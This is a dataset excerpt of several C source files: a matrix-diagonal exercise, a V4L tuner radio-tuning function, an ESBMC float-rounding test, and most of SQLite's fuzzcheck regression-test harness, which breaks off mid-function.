file
stringlengths
18
26
data
stringlengths
3
1.04M
the_stack_data/643193.c
/* c2z1 wyswietlanie przekatnej na wskaznikach */ #include <stdio.h> #include <time.h> #include <stdlib.h> #define N 5 void wypelnij(int(*tab)[N]); void wypisz(int(*tab)[N]); void przekatna(int(*tab)[N]);//wyswietla elementy z przekatnej int main(void) { srand((unsigned)time(0)); int tab[N][N]; wypelnij(tab); wypisz(tab); printf("\n\n"); przekatna(tab); } void wypelnij(int (*tab)[N]) { int i,j; for(i=0;i<N;i++) { for(j=0;j<N;j++) { tab[i][j]=1+rand()%100; } } } void wypisz(int (*tab)[N]) { int i,j; for(i=0;i<N;i++) { for(j=0;j<N;j++) { printf("%d\t",tab[i][j]); } printf("\n"); } } void przekatna(int (*tab)[N]) { int i,j; for(i=0;i<N;i++) { for(j=0;j<N;j++) { if(i==j) { printf("%d\t",*(*(tab+i)+j)); } } printf("\n"); } }
the_stack_data/50137741.c
#define NULL ((void*)0) typedef unsigned long size_t; // Customize by platform. typedef long intptr_t; typedef unsigned long uintptr_t; typedef long scalar_t__; // Either arithmetic or pointer type. /* By default, we understand bool (as a convenience). */ typedef int bool; #define false 0 #define true 1 /* Forward declarations */ typedef struct TYPE_4__ TYPE_2__ ; typedef struct TYPE_3__ TYPE_1__ ; /* Type definitions */ typedef int u8 ; typedef int u16 ; struct v4l2_priv_tun_config {int* priv; int /*<<< orphan*/ tuner; } ; struct tunertype {int count; struct tuner_params* params; } ; struct TYPE_4__ {int /*<<< orphan*/ adap; } ; struct tuner_simple_priv {int last_div; int type; TYPE_2__ i2c_props; struct tunertype* tun; } ; struct tuner_params {scalar_t__ type; int radio_if; scalar_t__ fm_gain_normal; scalar_t__ port1_set_for_fm_mono; scalar_t__ intercarrier_mode; int /*<<< orphan*/ port2_fm_high_sensitivity; scalar_t__ port2_active; int /*<<< orphan*/ port1_fm_high_sensitivity; scalar_t__ port1_active; scalar_t__ has_tda9887; scalar_t__ cb_first_if_lower_freq; TYPE_1__* ranges; } ; struct dvb_frontend {struct tuner_simple_priv* tuner_priv; } ; struct analog_parameters {unsigned int frequency; scalar_t__ audmode; } ; struct TYPE_3__ {int config; } ; /* Variables and functions */ int TDA9887_GAIN_NORMAL ; int TDA9887_INTERCARRIER ; int TDA9887_PORT1_ACTIVE ; int TDA9887_PORT2_ACTIVE ; int TDA9887_RIF_41_3 ; scalar_t__ TUNER_PARAM_TYPE_RADIO ; #define TUNER_PHILIPS_FM1216ME_MK3 128 int TUNER_RATIO_MASK ; int TUNER_RATIO_SELECT_50 ; int /*<<< orphan*/ TUNER_SET_CONFIG ; int /*<<< orphan*/ TUNER_TDA9887 ; scalar_t__ V4L2_TUNER_MODE_MONO ; int /*<<< orphan*/ i2c_clients_command (int /*<<< orphan*/ ,int /*<<< orphan*/ ,struct v4l2_priv_tun_config*) ; int /*<<< orphan*/ simple_radio_bandswitch (struct dvb_frontend*,int*) ; int /*<<< orphan*/ tuner_dbg (char*,int,int,int,int) ; int tuner_i2c_xfer_send (TYPE_2__*,int*,int) ; int /*<<< orphan*/ tuner_warn (char*,int) ; __attribute__((used)) static int simple_set_radio_freq(struct dvb_frontend *fe, struct analog_parameters *params) { struct tunertype *tun; struct tuner_simple_priv *priv = fe->tuner_priv; u8 buffer[4]; u16 div; int rc, j; struct tuner_params *t_params; unsigned int freq = params->frequency; bool mono = params->audmode == V4L2_TUNER_MODE_MONO; tun = priv->tun; for (j = tun->count-1; j > 0; j--) if (tun->params[j].type == TUNER_PARAM_TYPE_RADIO) break; /* default t_params (j=0) will be used if desired type wasn't found */ t_params = &tun->params[j]; /* Select Radio 1st IF used */ switch (t_params->radio_if) { case 0: /* 10.7 MHz */ freq += (unsigned int)(10.7*16000); break; case 1: /* 33.3 MHz */ freq += (unsigned int)(33.3*16000); break; case 2: /* 41.3 MHz */ freq += (unsigned int)(41.3*16000); break; default: tuner_warn("Unsupported radio_if value %d\n", t_params->radio_if); return 0; } buffer[2] = (t_params->ranges[0].config & ~TUNER_RATIO_MASK) | TUNER_RATIO_SELECT_50; /* 50 kHz step */ /* Bandswitch byte */ simple_radio_bandswitch(fe, &buffer[0]); /* Convert from 1/16 kHz V4L steps to 1/20 MHz (=50 kHz) PLL steps freq * (1 Mhz / 16000 V4L steps) * (20 PLL steps / 1 MHz) = freq * (1/800) */ div = (freq + 400) / 800; if (t_params->cb_first_if_lower_freq && div < priv->last_div) { buffer[0] = buffer[2]; buffer[1] = buffer[3]; buffer[2] = (div>>8) & 0x7f; buffer[3] = div & 0xff; } else { buffer[0] = (div>>8) & 0x7f; buffer[1] = div & 0xff; } tuner_dbg("radio 0x%02x 0x%02x 0x%02x 0x%02x\n", buffer[0], buffer[1], buffer[2], buffer[3]); priv->last_div = div; if (t_params->has_tda9887) { int config = 0; struct v4l2_priv_tun_config tda9887_cfg; tda9887_cfg.tuner = TUNER_TDA9887; tda9887_cfg.priv = &config; if (t_params->port1_active && !t_params->port1_fm_high_sensitivity) config |= TDA9887_PORT1_ACTIVE; if (t_params->port2_active && !t_params->port2_fm_high_sensitivity) config |= TDA9887_PORT2_ACTIVE; if (t_params->intercarrier_mode) config |= TDA9887_INTERCARRIER; if (t_params->port1_set_for_fm_mono && mono) config &= ~TDA9887_PORT1_ACTIVE; if (t_params->fm_gain_normal) config |= TDA9887_GAIN_NORMAL; if (t_params->radio_if == 2) config |= TDA9887_RIF_41_3; i2c_clients_command(priv->i2c_props.adap, TUNER_SET_CONFIG, &tda9887_cfg); } rc = tuner_i2c_xfer_send(&priv->i2c_props, buffer, 4); if (4 != rc) tuner_warn("i2c i/o error: rc == %d (should be 4)\n", rc); /* Write AUX byte */ switch (priv->type) { case TUNER_PHILIPS_FM1216ME_MK3: buffer[2] = 0x98; buffer[3] = 0x20; /* set TOP AGC */ rc = tuner_i2c_xfer_send(&priv->i2c_props, buffer, 4); if (4 != rc) tuner_warn("i2c i/o error: rc == %d (should be 4)\n", rc); break; } return 0; }
the_stack_data/115765681.c
/* ** float-rounder-bug.c ** ** Martin Brain ** [email protected] ** 20/05/13 ** ** Another manifestation of the casting bug. ** If the number is in (0,0x1p-126) it is rounded to zero rather than a subnormal number. */ #define FULP 1 void bug (float min) { __ESBMC_assume(min == 0x1.fffffep-105f); float modifier = (0x1.0p-23 * (1<<FULP)); float ulpdiff = min * modifier; assert(ulpdiff == 0x1p-126f); // Should be true return; } void bugBrokenOut (float min) { __ESBMC_assume(min == 0x1.fffffep-105f); float modifier = (0x1.0p-23 * (1<<FULP)); double dulpdiff = (double)min * (double)modifier; // Fine up to here float ulpdiff = (float)dulpdiff; // Error assert(ulpdiff == 0x1p-126f); // Should be true return; } void bugCasting (double d) { __ESBMC_assume(d == 0x1.fffffep-127); float f = (float) d; assert(f == 0x1p-126f); // Should be true return; } int main (void) { float f; bug(f); float g; bugBrokenOut(g); double d; bugCasting(d); return 1; }
the_stack_data/33827.c
/* ** 2015-05-25 ** ** The author disclaims copyright to this source code. In place of ** a legal notice, here is a blessing: ** ** May you do good and not evil. ** May you find forgiveness for yourself and forgive others. ** May you share freely, never taking more than you give. ** ************************************************************************* ** ** This is a utility program designed to aid running regressions tests on ** the SQLite library using data from external fuzzers. ** ** This program reads content from an SQLite database file with the following ** schema: ** ** CREATE TABLE db( ** dbid INTEGER PRIMARY KEY, -- database id ** dbcontent BLOB -- database disk file image ** ); ** CREATE TABLE xsql( ** sqlid INTEGER PRIMARY KEY, -- SQL script id ** sqltext TEXT -- Text of SQL statements to run ** ); ** CREATE TABLE IF NOT EXISTS readme( ** msg TEXT -- Human-readable description of this test collection ** ); ** ** For each database file in the DB table, the SQL text in the XSQL table ** is run against that database. All README.MSG values are printed prior ** to the start of the test (unless the --quiet option is used). If the ** DB table is empty, then all entries in XSQL are run against an empty ** in-memory database. ** ** This program is looking for crashes, assertion faults, and/or memory leaks. ** No attempt is made to verify the output. The assumption is that either all ** of the database files or all of the SQL statements are malformed inputs, ** generated by a fuzzer, that need to be checked to make sure they do not ** present a security risk. ** ** This program also includes some command-line options to help with ** creation and maintenance of the source content database. The command ** ** ./fuzzcheck database.db --load-sql FILE... ** ** Loads all FILE... arguments into the XSQL table. The --load-db option ** works the same but loads the files into the DB table. The -m option can ** be used to initialize the README table. The "database.db" file is created ** if it does not previously exist. Example: ** ** ./fuzzcheck new.db --load-sql *.sql ** ./fuzzcheck new.db --load-db *.db ** ./fuzzcheck new.db -m 'New test cases' ** ** The three commands above will create the "new.db" file and initialize all ** tables. Then do "./fuzzcheck new.db" to run the tests. ** ** DEBUGGING HINTS: ** ** If fuzzcheck does crash, it can be run in the debugger and the content ** of the global variable g.zTextName[] will identify the specific XSQL and ** DB values that were running when the crash occurred. ** ** DBSQLFUZZ: (Added 2020-02-25) ** ** The dbsqlfuzz fuzzer includes both a database file and SQL to run against ** that database in its input. This utility can now process dbsqlfuzz ** input files. Load such files using the "--load-dbsql FILE ..." command-line ** option. ** ** Dbsqlfuzz inputs are ordinary text. The first part of the file is text ** that describes the content of the database (using a lot of hexadecimal), ** then there is a divider line followed by the SQL to run against the ** database. Because they are ordinary text, dbsqlfuzz inputs are stored ** in the XSQL table, as if they were ordinary SQL inputs. The isDbSql() ** function can look at a text string and determine whether or not it is ** a valid dbsqlfuzz input. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdarg.h> #include <ctype.h> #include <assert.h> #include "sqlite3.h" #define ISSPACE(X) isspace((unsigned char)(X)) #define ISDIGIT(X) isdigit((unsigned char)(X)) #ifdef __unix__ # include <signal.h> # include <unistd.h> #endif #include <stddef.h> #if !defined(_MSC_VER) # include <stdint.h> #endif #if defined(_MSC_VER) typedef unsigned char uint8_t; #endif /* ** Files in the virtual file system. */ typedef struct VFile VFile; struct VFile { char *zFilename; /* Filename. NULL for delete-on-close. From malloc() */ int sz; /* Size of the file in bytes */ int nRef; /* Number of references to this file */ unsigned char *a; /* Content of the file. From malloc() */ }; typedef struct VHandle VHandle; struct VHandle { sqlite3_file base; /* Base class. Must be first */ VFile *pVFile; /* The underlying file */ }; /* ** The value of a database file template, or of an SQL script */ typedef struct Blob Blob; struct Blob { Blob *pNext; /* Next in a list */ int id; /* Id of this Blob */ int seq; /* Sequence number */ int sz; /* Size of this Blob in bytes */ unsigned char a[1]; /* Blob content. Extra space allocated as needed. */ }; /* ** Maximum number of files in the in-memory virtual filesystem. */ #define MX_FILE 10 /* ** Maximum allowed file size */ #define MX_FILE_SZ 10000000 /* ** All global variables are gathered into the "g" singleton. */ static struct GlobalVars { const char *zArgv0; /* Name of program */ const char *zDbFile; /* Name of database file */ VFile aFile[MX_FILE]; /* The virtual filesystem */ int nDb; /* Number of template databases */ Blob *pFirstDb; /* Content of first template database */ int nSql; /* Number of SQL scripts */ Blob *pFirstSql; /* First SQL script */ unsigned int uRandom; /* Seed for the SQLite PRNG */ char zTestName[100]; /* Name of current test */ } g; /* ** Include the external vt02.c module, if requested by compile-time ** options. */ #ifdef VT02_SOURCES # include "vt02.c" #endif /* ** Print an error message and quit. */ static void fatalError(const char *zFormat, ...){ va_list ap; fprintf(stderr, "%s", g.zArgv0); if( g.zDbFile ) fprintf(stderr, " %s", g.zDbFile); if( g.zTestName[0] ) fprintf(stderr, " (%s)", g.zTestName); fprintf(stderr, ": "); va_start(ap, zFormat); vfprintf(stderr, zFormat, ap); va_end(ap); fprintf(stderr, "\n"); exit(1); } /* ** signal handler */ #ifdef __unix__ static void signalHandler(int signum){ const char *zSig; if( signum==SIGABRT ){ zSig = "abort"; }else if( signum==SIGALRM ){ zSig = "timeout"; }else if( signum==SIGSEGV ){ zSig = "segfault"; }else{ zSig = "signal"; } fatalError(zSig); } #endif /* ** Set the an alarm to go off after N seconds. Disable the alarm ** if N==0 */ static void setAlarm(int N){ #ifdef __unix__ alarm(N); #else (void)N; #endif } #ifndef SQLITE_OMIT_PROGRESS_CALLBACK /* ** This an SQL progress handler. After an SQL statement has run for ** many steps, we want to interrupt it. This guards against infinite ** loops from recursive common table expressions. ** ** *pVdbeLimitFlag is true if the --limit-vdbe command-line option is used. ** In that case, hitting the progress handler is a fatal error. */ static int progressHandler(void *pVdbeLimitFlag){ if( *(int*)pVdbeLimitFlag ) fatalError("too many VDBE cycles"); return 1; } #endif /* ** Reallocate memory. Show an error and quit if unable. */ static void *safe_realloc(void *pOld, int szNew){ void *pNew = realloc(pOld, szNew<=0 ? 1 : szNew); if( pNew==0 ) fatalError("unable to realloc for %d bytes", szNew); return pNew; } /* ** Initialize the virtual file system. */ static void formatVfs(void){ int i; for(i=0; i<MX_FILE; i++){ g.aFile[i].sz = -1; g.aFile[i].zFilename = 0; g.aFile[i].a = 0; g.aFile[i].nRef = 0; } } /* ** Erase all information in the virtual file system. */ static void reformatVfs(void){ int i; for(i=0; i<MX_FILE; i++){ if( g.aFile[i].sz<0 ) continue; if( g.aFile[i].zFilename ){ free(g.aFile[i].zFilename); g.aFile[i].zFilename = 0; } if( g.aFile[i].nRef>0 ){ fatalError("file %d still open. nRef=%d", i, g.aFile[i].nRef); } g.aFile[i].sz = -1; free(g.aFile[i].a); g.aFile[i].a = 0; g.aFile[i].nRef = 0; } } /* ** Find a VFile by name */ static VFile *findVFile(const char *zName){ int i; if( zName==0 ) return 0; for(i=0; i<MX_FILE; i++){ if( g.aFile[i].zFilename==0 ) continue; if( strcmp(g.aFile[i].zFilename, zName)==0 ) return &g.aFile[i]; } return 0; } /* ** Find a VFile by name. Create it if it does not already exist and ** initialize it to the size and content given. ** ** Return NULL only if the filesystem is full. */ static VFile *createVFile(const char *zName, int sz, unsigned char *pData){ VFile *pNew = findVFile(zName); int i; if( pNew ) return pNew; for(i=0; i<MX_FILE && g.aFile[i].sz>=0; i++){} if( i>=MX_FILE ) return 0; pNew = &g.aFile[i]; if( zName ){ int nName = (int)strlen(zName)+1; pNew->zFilename = safe_realloc(0, nName); memcpy(pNew->zFilename, zName, nName); }else{ pNew->zFilename = 0; } pNew->nRef = 0; pNew->sz = sz; pNew->a = safe_realloc(0, sz); if( sz>0 ) memcpy(pNew->a, pData, sz); return pNew; } /* Return true if the line is all zeros */ static int allZero(unsigned char *aLine){ int i; for(i=0; i<16 && aLine[i]==0; i++){} return i==16; } /* ** Render a database and query as text that can be input into ** the CLI. */ static void renderDbSqlForCLI( FILE *out, /* Write to this file */ const char *zFile, /* Name of the database file */ unsigned char *aDb, /* Database content */ int nDb, /* Number of bytes in aDb[] */ unsigned char *zSql, /* SQL content */ int nSql /* Bytes of SQL */ ){ fprintf(out, ".print ******* %s *******\n", zFile); if( nDb>100 ){ int i, j; /* Loop counters */ int pgsz; /* Size of each page */ int lastPage = 0; /* Last page number shown */ int iPage; /* Current page number */ unsigned char *aLine; /* Single line to display */ unsigned char buf[16]; /* Fake line */ unsigned char bShow[256]; /* Characters ok to display */ memset(bShow, '.', sizeof(bShow)); for(i=' '; i<='~'; i++){ if( i!='{' && i!='}' && i!='"' && i!='\\' ) bShow[i] = i; } pgsz = (aDb[16]<<8) | aDb[17]; if( pgsz==0 ) pgsz = 65536; if( pgsz<512 || (pgsz&(pgsz-1))!=0 ) pgsz = 4096; fprintf(out,".open --hexdb\n"); fprintf(out,"| size %d pagesize %d filename %s\n",nDb,pgsz,zFile); for(i=0; i<nDb; i += 16){ if( i+16>nDb ){ memset(buf, 0, sizeof(buf)); memcpy(buf, aDb+i, nDb-i); aLine = buf; }else{ aLine = aDb + i; } if( allZero(aLine) ) continue; iPage = i/pgsz + 1; if( lastPage!=iPage ){ fprintf(out,"| page %d offset %d\n", iPage, (iPage-1)*pgsz); lastPage = iPage; } fprintf(out,"| %5d:", i-(iPage-1)*pgsz); for(j=0; j<16; j++) fprintf(out," %02x", aLine[j]); fprintf(out," "); for(j=0; j<16; j++){ unsigned char c = (unsigned char)aLine[j]; fputc( bShow[c], stdout); } fputc('\n', stdout); } fprintf(out,"| end %s\n", zFile); }else{ fprintf(out,".open :memory:\n"); } fprintf(out,".testctrl prng_seed 1 db\n"); fprintf(out,".testctrl internal_functions\n"); fprintf(out,"%.*s", nSql, zSql); if( nSql>0 && zSql[nSql-1]!='\n' ) fprintf(out, "\n"); } /* ** Read the complete content of a file into memory. Add a 0x00 terminator ** and return a pointer to the result. ** ** The file content is held in memory obtained from sqlite_malloc64() which ** should be freed by the caller. */ static char *readFile(const char *zFilename, long *sz){ FILE *in; long nIn; unsigned char *pBuf; *sz = 0; if( zFilename==0 ) return 0; in = fopen(zFilename, "rb"); if( in==0 ) return 0; fseek(in, 0, SEEK_END); *sz = nIn = ftell(in); rewind(in); pBuf = sqlite3_malloc64( nIn+1 ); if( pBuf && 1==fread(pBuf, nIn, 1, in) ){ pBuf[nIn] = 0; fclose(in); return (char*)pBuf; } sqlite3_free(pBuf); *sz = 0; fclose(in); return 0; } /* ** Implementation of the "readfile(X)" SQL function. The entire content ** of the file named X is read and returned as a BLOB. NULL is returned ** if the file does not exist or is unreadable. */ static void readfileFunc( sqlite3_context *context, int argc, sqlite3_value **argv ){ long nIn; void *pBuf; const char *zName = (const char*)sqlite3_value_text(argv[0]); if( zName==0 ) return; pBuf = readFile(zName, &nIn); if( pBuf ){ sqlite3_result_blob(context, pBuf, nIn, sqlite3_free); } } /* ** Implementation of the "readtextfile(X)" SQL function. The text content ** of the file named X through the end of the file or to the first \000 ** character, whichever comes first, is read and returned as TEXT. NULL ** is returned if the file does not exist or is unreadable. */ static void readtextfileFunc( sqlite3_context *context, int argc, sqlite3_value **argv ){ const char *zName; FILE *in; long nIn; char *pBuf; zName = (const char*)sqlite3_value_text(argv[0]); if( zName==0 ) return; in = fopen(zName, "rb"); if( in==0 ) return; fseek(in, 0, SEEK_END); nIn = ftell(in); rewind(in); pBuf = sqlite3_malloc64( nIn+1 ); if( pBuf && 1==fread(pBuf, nIn, 1, in) ){ pBuf[nIn] = 0; sqlite3_result_text(context, pBuf, -1, sqlite3_free); }else{ sqlite3_free(pBuf); } fclose(in); } /* ** Implementation of the "writefile(X,Y)" SQL function. The argument Y ** is written into file X. The number of bytes written is returned. Or ** NULL is returned if something goes wrong, such as being unable to open ** file X for writing. */ static void writefileFunc( sqlite3_context *context, int argc, sqlite3_value **argv ){ FILE *out; const char *z; sqlite3_int64 rc; const char *zFile; (void)argc; zFile = (const char*)sqlite3_value_text(argv[0]); if( zFile==0 ) return; out = fopen(zFile, "wb"); if( out==0 ) return; z = (const char*)sqlite3_value_blob(argv[1]); if( z==0 ){ rc = 0; }else{ rc = fwrite(z, 1, sqlite3_value_bytes(argv[1]), out); } fclose(out); sqlite3_result_int64(context, rc); } /* ** Load a list of Blob objects from the database */ static void blobListLoadFromDb( sqlite3 *db, /* Read from this database */ const char *zSql, /* Query used to extract the blobs */ int onlyId, /* Only load where id is this value */ int *pN, /* OUT: Write number of blobs loaded here */ Blob **ppList /* OUT: Write the head of the blob list here */ ){ Blob head; Blob *p; sqlite3_stmt *pStmt; int n = 0; int rc; char *z2; if( onlyId>0 ){ z2 = sqlite3_mprintf("%s WHERE rowid=%d", zSql, onlyId); }else{ z2 = sqlite3_mprintf("%s", zSql); } rc = sqlite3_prepare_v2(db, z2, -1, &pStmt, 0); sqlite3_free(z2); if( rc ) fatalError("%s", sqlite3_errmsg(db)); head.pNext = 0; p = &head; while( SQLITE_ROW==sqlite3_step(pStmt) ){ int sz = sqlite3_column_bytes(pStmt, 1); Blob *pNew = safe_realloc(0, sizeof(*pNew)+sz ); pNew->id = sqlite3_column_int(pStmt, 0); pNew->sz = sz; pNew->seq = n++; pNew->pNext = 0; memcpy(pNew->a, sqlite3_column_blob(pStmt,1), sz); pNew->a[sz] = 0; p->pNext = pNew; p = pNew; } sqlite3_finalize(pStmt); *pN = n; *ppList = head.pNext; } /* ** Free a list of Blob objects */ static void blobListFree(Blob *p){ Blob *pNext; while( p ){ pNext = p->pNext; free(p); p = pNext; } } /* Return the current wall-clock time ** ** The number of milliseconds since the julian epoch. ** 1907-01-01 00:00:00 -> 210866716800000 ** 2021-01-01 00:00:00 -> 212476176000000 */ static sqlite3_int64 timeOfDay(void){ static sqlite3_vfs *clockVfs = 0; sqlite3_int64 t; if( clockVfs==0 ){ clockVfs = sqlite3_vfs_find(0); if( clockVfs==0 ) return 0; } if( clockVfs->iVersion>=1 && clockVfs->xCurrentTimeInt64!=0 ){ clockVfs->xCurrentTimeInt64(clockVfs, &t); }else{ double r; clockVfs->xCurrentTime(clockVfs, &r); t = (sqlite3_int64)(r*86400000.0); } return t; } /*************************************************************************** ** Code to process combined database+SQL scripts generated by the ** dbsqlfuzz fuzzer. */ /* An instance of the following object is passed by pointer as the ** client data to various callbacks. */ typedef struct FuzzCtx { sqlite3 *db; /* The database connection */ sqlite3_int64 iCutoffTime; /* Stop processing at this time. */ sqlite3_int64 iLastCb; /* Time recorded for previous progress callback */ sqlite3_int64 mxInterval; /* Longest interval between two progress calls */ unsigned nCb; /* Number of progress callbacks */ unsigned mxCb; /* Maximum number of progress callbacks allowed */ unsigned execCnt; /* Number of calls to the sqlite3_exec callback */ int timeoutHit; /* True when reaching a timeout */ } FuzzCtx; /* Verbosity level for the dbsqlfuzz test runner */ static int eVerbosity = 0; /* True to activate PRAGMA vdbe_debug=on */ static int bVdbeDebug = 0; /* Timeout for each fuzzing attempt, in milliseconds */ static int giTimeout = 10000; /* Defaults to 10 seconds */ /* Maximum number of progress handler callbacks */ static unsigned int mxProgressCb = 2000; /* Maximum string length in SQLite */ static int lengthLimit = 1000000; /* Maximum expression depth */ static int depthLimit = 500; /* Limit on the amount of heap memory that can be used */ static sqlite3_int64 heapLimit = 100000000; /* Maximum byte-code program length in SQLite */ static int vdbeOpLimit = 25000; /* Maximum size of the in-memory database */ static sqlite3_int64 maxDbSize = 104857600; /* OOM simulation parameters */ static unsigned int oomCounter = 0; /* Simulate OOM when equals 1 */ static unsigned int oomRepeat = 0; /* Number of OOMs in a row */ static void*(*defaultMalloc)(int) = 0; /* The low-level malloc routine */ /* This routine is called when a simulated OOM occurs. It is broken ** out as a separate routine to make it easy to set a breakpoint on ** the OOM */ void oomFault(void){ if( eVerbosity ){ printf("Simulated OOM fault\n"); } if( oomRepeat>0 ){ oomRepeat--; }else{ oomCounter--; } } /* This routine is a replacement malloc() that is used to simulate ** Out-Of-Memory (OOM) errors for testing purposes. */ static void *oomMalloc(int nByte){ if( oomCounter ){ if( oomCounter==1 ){ oomFault(); return 0; }else{ oomCounter--; } } return defaultMalloc(nByte); } /* Register the OOM simulator. This must occur before any memory ** allocations */ static void registerOomSimulator(void){ sqlite3_mem_methods mem; sqlite3_shutdown(); sqlite3_config(SQLITE_CONFIG_GETMALLOC, &mem); defaultMalloc = mem.xMalloc; mem.xMalloc = oomMalloc; sqlite3_config(SQLITE_CONFIG_MALLOC, &mem); } /* Turn off any pending OOM simulation */ static void disableOom(void){ oomCounter = 0; oomRepeat = 0; } /* ** Translate a single byte of Hex into an integer. ** This routine only works if h really is a valid hexadecimal ** character: 0..9a..fA..F */ static unsigned char hexToInt(unsigned int h){ #ifdef SQLITE_EBCDIC h += 9*(1&~(h>>4)); /* EBCDIC */ #else h += 9*(1&(h>>6)); /* ASCII */ #endif return h & 0xf; } /* ** The first character of buffer zIn[0..nIn-1] is a '['. This routine ** checked to see if the buffer holds "[NNNN]" or "[+NNNN]" and if it ** does it makes corresponding changes to the *pK value and *pI value ** and returns true. If the input buffer does not match the patterns, ** no changes are made to either *pK or *pI and this routine returns false. */ static int isOffset( const unsigned char *zIn, /* Text input */ int nIn, /* Bytes of input */ unsigned int *pK, /* half-byte cursor to adjust */ unsigned int *pI /* Input index to adjust */ ){ int i; unsigned int k = 0; unsigned char c; for(i=1; i<nIn && (c = zIn[i])!=']'; i++){ if( !isxdigit(c) ) return 0; k = k*16 + hexToInt(c); } if( i==nIn ) return 0; *pK = 2*k; *pI += i; return 1; } /* ** Decode the text starting at zIn into a binary database file. ** The maximum length of zIn is nIn bytes. Store the binary database ** file in space obtained from sqlite3_malloc(). ** ** Return the number of bytes of zIn consumed. Or return -1 if there ** is an error. One potential error is that the recipe specifies a ** database file larger than MX_FILE_SZ bytes. ** ** Abort on an OOM. */ static int decodeDatabase( const unsigned char *zIn, /* Input text to be decoded */ int nIn, /* Bytes of input text */ unsigned char **paDecode, /* OUT: decoded database file */ int *pnDecode /* OUT: Size of decoded database */ ){ unsigned char *a, *aNew; /* Database under construction */ int mx = 0; /* Current size of the database */ sqlite3_uint64 nAlloc = 4096; /* Space allocated in a[] */ unsigned int i; /* Next byte of zIn[] to read */ unsigned int j; /* Temporary integer */ unsigned int k; /* half-byte cursor index for output */ unsigned int n; /* Number of bytes of input */ unsigned char b = 0; if( nIn<4 ) return -1; n = (unsigned int)nIn; a = sqlite3_malloc64( nAlloc ); if( a==0 ){ fprintf(stderr, "Out of memory!\n"); exit(1); } memset(a, 0, (size_t)nAlloc); for(i=k=0; i<n; i++){ unsigned char c = (unsigned char)zIn[i]; if( isxdigit(c) ){ k++; if( k & 1 ){ b = hexToInt(c)*16; }else{ b += hexToInt(c); j = k/2 - 1; if( j>=nAlloc ){ sqlite3_uint64 newSize; if( nAlloc==MX_FILE_SZ || j>=MX_FILE_SZ ){ if( eVerbosity ){ fprintf(stderr, "Input database too big: max %d bytes\n", MX_FILE_SZ); } sqlite3_free(a); return -1; } newSize = nAlloc*2; if( newSize<=j ){ newSize = (j+4096)&~4095; } if( newSize>MX_FILE_SZ ){ if( j>=MX_FILE_SZ ){ sqlite3_free(a); return -1; } newSize = MX_FILE_SZ; } aNew = sqlite3_realloc64( a, newSize ); if( aNew==0 ){ sqlite3_free(a); return -1; } a = aNew; assert( newSize > nAlloc ); memset(a+nAlloc, 0, (size_t)(newSize - nAlloc)); nAlloc = newSize; } if( j>=(unsigned)mx ){ mx = (j + 4095)&~4095; if( mx>MX_FILE_SZ ) mx = MX_FILE_SZ; } assert( j<nAlloc ); a[j] = b; } }else if( zIn[i]=='[' && i<n-3 && isOffset(zIn+i, nIn-i, &k, &i) ){ continue; }else if( zIn[i]=='\n' && i<n-4 && memcmp(zIn+i,"\n--\n",4)==0 ){ i += 4; break; } } *pnDecode = mx; *paDecode = a; return i; } /* ** Progress handler callback. ** ** The argument is the cutoff-time after which all processing should ** stop. So return non-zero if the cut-off time is exceeded. */ static int progress_handler(void *pClientData) { FuzzCtx *p = (FuzzCtx*)pClientData; sqlite3_int64 iNow = timeOfDay(); int rc = iNow>=p->iCutoffTime; sqlite3_int64 iDiff = iNow - p->iLastCb; /* printf("time-remaining: %lld\n", p->iCutoffTime - iNow); */ if( iDiff > p->mxInterval ) p->mxInterval = iDiff; p->nCb++; if( rc==0 && p->mxCb>0 && p->mxCb<=p->nCb ) rc = 1; if( rc && !p->timeoutHit && eVerbosity>=2 ){ printf("Timeout on progress callback %d\n", p->nCb); fflush(stdout); p->timeoutHit = 1; } return rc; } /* ** Disallow debugging pragmas such as "PRAGMA vdbe_debug" and ** "PRAGMA parser_trace" since they can dramatically increase the ** amount of output without actually testing anything useful. ** ** Also block ATTACH if attaching a file from the filesystem. */ static int block_troublesome_sql( void *Notused, int eCode, const char *zArg1, const char *zArg2, const char *zArg3, const char *zArg4 ){ (void)Notused; (void)zArg2; (void)zArg3; (void)zArg4; if( eCode==SQLITE_PRAGMA ){ if( sqlite3_stricmp("busy_timeout",zArg1)==0 && (zArg2==0 || strtoll(zArg2,0,0)>100 || strtoll(zArg2,0,10)>100) ){ return SQLITE_DENY; }else if( eVerbosity==0 ){ if( sqlite3_strnicmp("vdbe_", zArg1, 5)==0 || sqlite3_stricmp("parser_trace", zArg1)==0 || sqlite3_stricmp("temp_store_directory", zArg1)==0 ){ return SQLITE_DENY; } }else if( sqlite3_stricmp("oom",zArg1)==0 && zArg2!=0 && zArg2[0]!=0 ){ oomCounter = atoi(zArg2); } }else if( eCode==SQLITE_ATTACH ){ /* Deny the ATTACH if it is attaching anything other than an in-memory ** database. */ if( zArg1==0 ) return SQLITE_DENY; if( strcmp(zArg1,":memory:")==0 ) return SQLITE_OK; if( sqlite3_strglob("file:*[?]vfs=memdb", zArg1)==0 && sqlite3_strglob("file:*[^/a-zA-Z0-9_.]*[?]vfs=memdb", zArg1)!=0 ){ return SQLITE_OK; } return SQLITE_DENY; } return SQLITE_OK; } /* ** Run the SQL text */ static int runDbSql(sqlite3 *db, const char *zSql){ int rc; sqlite3_stmt *pStmt; while( isspace(zSql[0]&0x7f) ) zSql++; if( zSql[0]==0 ) return SQLITE_OK; if( eVerbosity>=4 ){ printf("RUNNING-SQL: [%s]\n", zSql); fflush(stdout); } rc = sqlite3_prepare_v2(db, zSql, -1, &pStmt, 0); if( rc==SQLITE_OK ){ while( (rc = sqlite3_step(pStmt))==SQLITE_ROW ){ if( eVerbosity>=5 ){ int j; for(j=0; j<sqlite3_column_count(pStmt); j++){ if( j ) printf(","); switch( sqlite3_column_type(pStmt, j) ){ case SQLITE_NULL: { printf("NULL"); break; } case SQLITE_INTEGER: case SQLITE_FLOAT: { printf("%s", sqlite3_column_text(pStmt, j)); break; } case SQLITE_BLOB: { int n = sqlite3_column_bytes(pStmt, j); int i; const unsigned char *a; a = (const unsigned char*)sqlite3_column_blob(pStmt, j); printf("x'"); for(i=0; i<n; i++){ printf("%02x", a[i]); } printf("'"); break; } case SQLITE_TEXT: { int n = sqlite3_column_bytes(pStmt, j); int i; const unsigned char *a; a = (const unsigned char*)sqlite3_column_blob(pStmt, j); printf("'"); for(i=0; i<n; i++){ if( a[i]=='\'' ){ printf("''"); }else{ putchar(a[i]); } } printf("'"); break; } } /* End switch() */ } /* End for() */ printf("\n"); fflush(stdout); } /* End if( eVerbosity>=5 ) */ } /* End while( SQLITE_ROW */ if( rc!=SQLITE_DONE && eVerbosity>=4 ){ 